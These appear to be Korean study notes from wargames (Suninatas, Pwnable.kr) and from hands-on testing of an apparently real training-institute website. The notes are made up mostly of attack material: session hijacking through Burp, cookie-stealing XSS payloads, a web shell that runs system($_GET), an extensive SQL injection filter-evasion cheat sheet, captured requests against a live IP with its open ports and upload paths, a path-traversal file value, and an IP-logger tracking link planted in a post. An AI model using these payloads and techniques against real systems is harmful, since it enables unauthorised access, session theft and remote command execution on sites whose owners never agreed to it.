12.16~

Pwnable.kr

 

 

 

PHPSESSID=tdl21lkc7116mthb1do16be0m1

 

Burp suite를 이용한 session 하이재킹

웹브라우저 Proxy 설정 후 쿠키안의 PHPSESSID 캡쳐

Intercept한 GET 요청에 복사한 SESSID 붙여넣고 전송

 

 

크로스 사이트 스크립팅 (XSS)

웹페이지의 입력칸을 이용

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

 

IFRAME Event based (filter evasion)

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

 

Reflected XSS???

 

 

Get방식일 경우 ? 뒤에 스크립트 삽입

http://14.36.28.173/main.php?field=%3Cscript%3Ealert%281%29%3C/script%3E&search_word=%3Cscript%3Ealert%28%22aaaa%22%29%3C/script%3E

 

디렉터리 리스팅

웹페이지의 디렉터리 정보를 알아내는 것(?)

페이지검사등으로 페이지소스를 보면 <script src = "./script/global.js"></script> 같은 정보를 알 수 있음\

 

 

웹쉘

파일 업로드 디렉터리가 ./upload일 경우

system($_GET('eee'))를 호출하는 eee.php를 업로드

14.36.28.173/upload/eee.php?eee='명령어'

 

 

 

 

Suninatas.com

Webhacking.kr

 

 

 

 

Suninatas Lv.6

1) 대소문자 변형

union select password from member where id='ireoa'--

UnION seLEct password ForM member WhErE id='ireoa'--

2) 공백 우회

/**/   %0a  %09  ()

3)  = 우회

union select password from member where username = 'ireoa'--

union select password from member where username like 'ireoa'--

4)URL Encoding

'%2f%2a*/union%2f%2a*/select%2f%2a*/password%2f%2a*/form%2f%2a*/member%2f%2a*/where%2f%2a*/username%2f%2a*/lie%2f%2a*/

'ireoa'--

가끔 실패 할수도있음 2중으로 한다

'252f%2f2a*/union252f%2f2a*/select252f%2f2a*/password252f%2f2a*/from252f%2f2a*/member252f%2f2a*/where252f%2f2a*/username252f%2f2a*/

like252f%2f2a*/'ireoa'--

5)유니코드 인코딩

1) '

%u0027

%u02b9

%u02bc

%u02c8

%u2032

%uff07

%c0%27

%c0%a7

%c0%80%a7

2)-

%u005f

%uff3f

%c0%2d

%c0%ad

%e0%80%ad

3)/

%u2215

%u2044

%uff0f

%c0%2f

%c0%af

%e0%80%af

4)(

%u0028

%uff08

%c0%28

%c0%a8

%e0%80%a8

5))

%u0029

%uff09

%c0%29

%c0%a9

%e0%80%a9

6)*

%u002a

%uff0a

%c0%2a

%c0%aa

%e0%80%aa

7) space

%u0020

%uff00

%c0%20

%c0%a0

%e0%80%a0

6)동적쿼리실행사용

MS-SQL : EXEC('SELECT password FROM member')

Oracle :

DECLEAR pw VARCHAR2(1000);

BEGIN

EXECUTE IMMEDIATE 'SELECT password FROM member' INTO pw;

DBMS_OUTPUT.PUT_LINE(pw); 

END;

 

7)SELECT

 

Oracle : 'SEL'||'ECT'

MS-SQL : 'SEL'+'ECT'     CHAR(93)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)

MySQL : 'SEL''ECT' 

 

MS-SQL에서  +를 %2b MySQL에서 빈공간을 %20으로 인코딩 해야함

Oracle에서는 더 가능함 REVERSE, TRANSLATE, REPLACE, SUBSTR 

 

8)NULL BYTE 우회 

IPS나 IDS를 우회하기 위해서 사용 웹방화벽 IDS/IPS는 주로 네이티브 코드로 작성되어있음 그래서 널바이트까지만 보므로 우회가 가능

 

%00' UNION SELECT password FROM member WHERE username='ireoa'--

 

9)연속구문우회

 

SELSELECTECT   빨간색이 사라지면서 파랑색의 SELECT 사용 가능

 

10)축소공격

 

다음 두가지 경우를 가정하자 

1)싱글쿼터(')를 ('')로 대체

2) 10개의 문자만 받는다  

 

그렇다면 만약 내가 aaaaaaaaa' 으로 공격을 시도한다면

첫번째 조건떄문에 aaaaaaaaa''으로 바뀌지만 10개의 문자만 전달하므로

내가원하는 aaaaaaaaa'이 들어가게 된다.

 

select * from member where username='aaaaaaaaa'' AND password = ''

만약 password에 or 1=1--을 넣어준다면

select * from member where username='aaaaaaaaa'' AND password = 'or 1=1--'

되므로 우회가 가능하다

 

출처: <http://lanian.tistory.com/entry/SQL-%EC%9D%B8%EC%A0%9D%EC%85%98-%EC%9A%B0%ED%9A%8C-%ED%8C%A8%ED%84%B4>

 

 

' or 1 like 1--

 

auth_key is suninatastopofworld!

 

GET /Part_one/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd HTTP/1.1

Host: suninatas.com

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Referer: http://suninatas.com/Part_one/web06/Serect.asp

Accept-Encoding: gzip, deflate, sdch

Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4

Cookie: ASPSESSIONIDQCSSACCS=COLCOECAFICBMCGEBCEFNBOH; auth%5Fkey=%3F%3F%3F%3F%3F

Connection: close

 

auth%5key=65038b0559e459420aa2d23093d01e4a

 

<form method="post" name="KEY_HINT" action="Rome's First Emperor">

 

 

 

9384

 

출처: <http://suninatas.com/Part_one/web25/web25.asp>

 

"http://www.suninatas.com/Part_one/web25/chk_key.asp?id=" + localEditable1.toString() + "&pw=" + localEditable2.toString() + "&Name=" + str1.toString() + "&Number=" + str3.toString()

 

ASPSESSIONIDQCSSACCS=JHMEOECALBANBMFLKABEDEGB

 

 

 

 

 

 

업무제휴에서 파일 올리면 저장되는 곳,

자료실 파일들 저장되어 있는 곳

14.36.28.181/kitri/uploadfile/

Burpsuite로 파일 업로드, 다운 가능

 

loginProc.web

<script type="text/javascript">

   var chk = "IDFAIL";

   if(chk == 'SUCCESS') {

   } else if(chk == 'IDFAIL') {

   alert("아이디 또는 비밀번호를 잘못 입력하셨습니다.");

//       alert("아이디가 존재하지 않습니다.");

   } else if(chk == 'PWDFAIL') {

       alert("아이디 또는 비밀번호를 잘못 입력하셨습니다.");

//       alert("비밀번호를 확인하시기 바랍니다.");

   } else if(chk == 'MEMFAIL') {

       alert("기업회원 승인 대기중입니다.");

   } else if(chk == 'SVCFAIL') {

       alert("로그인이 필요한 서비스입니다.");

   }

  

   location.href="/academy/main/main.web";

</script>

 

 

http://14.36.28.181/uploadfile/

/uploadfile/admin_log_chk.php?

 

 

/*
 * 파일 다운로드 처리
 * @param         String        inSiteDiv         사이트 구분 (kitri, academy, admin
 * @param         String        inFileNm        파일명
 */
// 파일 다운로드
function file_download(inSiteDiv, inFileNm){
    var indir = "/uploadfile/";
    var inUrl = "/" + inSiteDiv + "/file/download.web";

console.log (">>>>>>>>>>>>> inUrl ::: " + inUrl);
    console.log (">>>>>>>>>>>>> indir ::: " + indir);

var inputs1 ='<input type="hidden" name="dir" value="'+ indir +'" />';
    var inputs2 ='<input type="hidden" name="filename" value="'+ inFileNm +'" />';
    var inputs3 ='<input type="hidden" name="siteDiv" value="'+ inSiteDiv +'" />';

jQuery('<form action="' + inUrl + '" method="get">'+inputs1+inputs2+inputs3+'</form>')
    .appendTo('body').submit().remove();

return false;
}

 

출처: <http://14.36.28.181/static/js/common.js>

 

 

http://14.36.28.181/academy/it_education/edu_application.web?hd_site_div=C&lv_pkid=480&lv_yyyy=2016&lv_mm=0&lv_choice=0

 

열린 포트: 21, 80, 1723, 2222, 3306, 3389, 8009, 8080

 

 

 

{"success":"true","jsonData":{"condition":{"lv_pkid":"8823"},"dataInfo":{"SUBJECT":" ","FILE1_YN":"N","NAME":"관리자","WDATE":"2014-05-22","FILE4_YN":"N","PKID":"8823","FILE_02":"","GONG_CHK":"n","FILE_01":"","FILE_04":"","FILE_03":"","FILE2_YN":"N","CONTENT":>","FILE5_YN":"N","VISITED":6,"FILE":"","FILE3_YN":"N"}}}

 

{"success":"true","jsonData":{"condition":{"lv_pkid":"12195"},"dataInfo":{"SUBJECT":"OHH SHITTT!! MJ is SMART!!  ","FILE1_YN":"N","NAME":"jkh","WDATE":"2016-12-22","FILE4_YN":"N","PKID":"15995","FILE_02":"","GONG_CHK":"y","FILE_01":"","FILE_04":"","FILE_03":"","FILE2_YN":"N","CONTENT":"하핳ㅎㅎ","FILE5_YN":"N","VISITED":0,"FILE":"","FILE3_YN":"N"}}}

 

POST /academy/proc/board/tidings/noticeAcaView.json HTTP/1.1

Host: 14.36.28.181

Content-Length: 26

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://14.36.28.181

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://14.36.28.181/academy/tidings/notice_view.web?hd_site_div=C&lv_pkid=8823&lv_txt_such=&lv_sel_such=0&lv_page_num=6

Accept-Encoding: gzip, deflate

Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4

Cookie: JSESSIONID=88E59E12964169F55787B94FC89B963F

Connection: close

 

hd_site_div=C&lv_pkid=8823

 

POST /academy/proc/board/contact/qna_insert.json HTTP/1.1

Host: 14.36.28.181

Content-Length: 116

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://14.36.28.181

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://14.36.28.181/academy/contact/qna_write.web?hd_site_div=C&lv_txt_such=&lv_sel_such=0&lv_page_num=0

Accept-Encoding: gzip, deflate

Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4

Cookie: JSESSIONID=6E6FF4955D3DB40844248347A4306972

Connection: close

 

hd_site_div=C&hd_mnu_idx=null&boardid=5&bd_qna_div=3&qna_cate=3&bd_subject=333&bd_qna_wrt=333&ir1=333&bd_qna_pwd=333

 

 

 

POST /academy/proc/board/contact/qna_insert.json HTTP/1.1

Host: 14.36.28.181

Content-Length: 337

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://14.36.28.181

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://14.36.28.181/academy/tidings/notice_view.web?hd_site_div=C&lv_pkid=18823&lv_txt_such=&lv_sel_such=0&lv_page_num=0

Accept-Encoding: gzip, deflate

Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4

Cookie: JSESSIONID=A2E9D2F866AA4E3D3C204AC9E2AE60A1

Connection: close

 

hd_site_div=C&hd_mnu_idx=null&boardid=55&bd_qna_div=3&qna_cate=3&bd_subject=333&bd_qna_wrt=333&ir1=333&bd_qna_pwd=333

 

 

 

 

 

 

POST /academy/proc/board/tidings/selectNewsList.json HTTP/1.1

Host: 14.36.28.181

Content-Length: 54

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://14.36.28.181

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://14.36.28.181/academy/tidings/news_list.web?

Accept-Encoding: gzip, deflate

Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4

Cookie: JSESSIONID=A2E9D2F866AA4E3D3C204AC9E2AE60A1

Connection: close

 

hd_site_div=C&boardid=8&page_num=0&sel_such=&txt_such=

 

http://14.36.28.181/academy/tidings/news_list.web?

 

<a href="http://iplogger.org/28yF4.gif">이상해씨</a>

 

 

{"success":"true","jsonData":{"page_string":"<a href='#' class='first_bt' onclick=paging(0)><img alt=\"처음\" src=\"\/static\/images\/kitri\/sub\/board\/pge_first_btn.gif\"><\/a><a class='crnt'>1<\/a><a href='#' onclick=paging(1)>2<\/a><a href='#' onclick=paging(2)>3<\/a><a href='#' class='last_bt' onclick=paging(2)><img alt=\"마지막\" src=\"\/static\/images\/kitri\/sub\/board\/pge_last_btn.gif\"><\/a>","condition":{"sel_such":"1","txt_such":"","page_block":10,"page_num_block":0},"selectList":[{"SUBJECT":"Windows Server 2008 바이블","WDATE":"2014-07-11","WNAME":"찰리러셀外","DIVNM":"교재","PKID":"196","FILE":"b8.jpg","ROWNO":23,"WCOMPANY":"정보문화사"},{"SUBJECT":"스프링 시큐리티 3","WDATE":"2014-07-11","WNAME":"피터뮬라리","DIVNM":"교재","PKID":"195","FILE":"b7.jpg","ROWNO":22,"WCOMPANY":"위키북스"},{"SUBJECT":"정보보안 개론과 실습(시스템 해킹과 보안)","WDATE":"2014-07-11","WNAME":"양대일","DIVNM":"교재","PKID":"194","FILE":"b6.jpg","ROWNO":21,"WCOMPANY":"한빛미디어"},{"SUBJECT":"하둡 완벽 가이드","WDATE":"2014-07-11","WNAME":"톰화이트","DIVNM":"교재","PKID":"193","FILE":"b5.jpg","ROWNO":20,"WCOMPANY":"한빛미디어"},{"SUBJECT":"CentOS 리눅스 구축관리 실무","WDATE":"2014-07-11","WNAME":"김태용","DIVNM":"교재","PKID":"192","FILE":"b4.jpg","ROWNO":19,"WCOMPANY":"수퍼유저코리아"},{"SUBJECT":"자바 웹 프로그래밍 ","WDATE":"2014-07-11","WNAME":"황희정","DIVNM":"교재","PKID":"191","FILE":"b3.jpg","ROWNO":18,"WCOMPANY":"한빛아카데미"},{"SUBJECT":"JAVA의 정석","WDATE":"2014-07-11","WNAME":"남궁성","DIVNM":"교재","PKID":"190","FILE":"b2.jpg","ROWNO":17,"WCOMPANY":"도우출판"},{"SUBJECT":"오라클 11G + PL\/SQL 입문","WDATE":"2014-07-11","WNAME":"성윤정","DIVNM":"교재","PKID":"189","FILE":"b1.jpg","ROWNO":16,"WCOMPANY":"대림"},{"SUBJECT":"BackTrack 5 Wireless Penetration Testing ","WDATE":"2014-07-11","WNAME":"비벡라마찬","DIVNM":"교재","PKID":"188","FILE":"m8.jpg","ROWNO":15,"WCOMPANY":"에이콘출판"},{"SUBJECT":"최신 경향에 맞춘 정보보호전문가의 CISSP노트","WDATE":"2014-07-11","WNAME":"허종오外","DIVNM":"교재","PKID":"187","FILE":"m7.jpg","ROWNO":14,"WCOMPANY":"인포더북스"}]}}

 

{"SUBJECT":"이상해씨와 함께하는 패킷조작","WDATE":"2016-12-23","WNAME":"한가놈과 로켓단 포함 다수","DIVNM":"교재","PKID":"197","FILE":"../kitri/uploadfile/ecec.jpg","ROWNO":24,"WCOMPANY":"KITRI NCS 2기"}

 

 

POST /academy/proc/board/archives/textbook_list.json HTTP/1.1

Host: 14.36.28.181

Content-Length: 61

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://14.36.28.181

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://14.36.28.181/academy/archives/01_total_rental.web?

Accept-Encoding: gzip, deflate

Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4

Cookie: JSESSIONID=C98CA2626462B282822339DE4188BAAD

Connection: close

 

hd_site_div=C&hd_mnu_idx=null&page_num=0&sel_such=0&txt_such=

 

 

http://14.36.28.181/academy/archives/03_edu_view.web?hd_site_div=C&lv_pkid=92&lv_txt_such=&lv_sel_such=0&lv_page_num=0

 

 

 

 

 

http://14.36.28.181/academy/tidings/notice_view.web?hd_site_div=C&lv_pkid=18195&lv_txt_such=&lv_sel_such=0&lv_page_num=0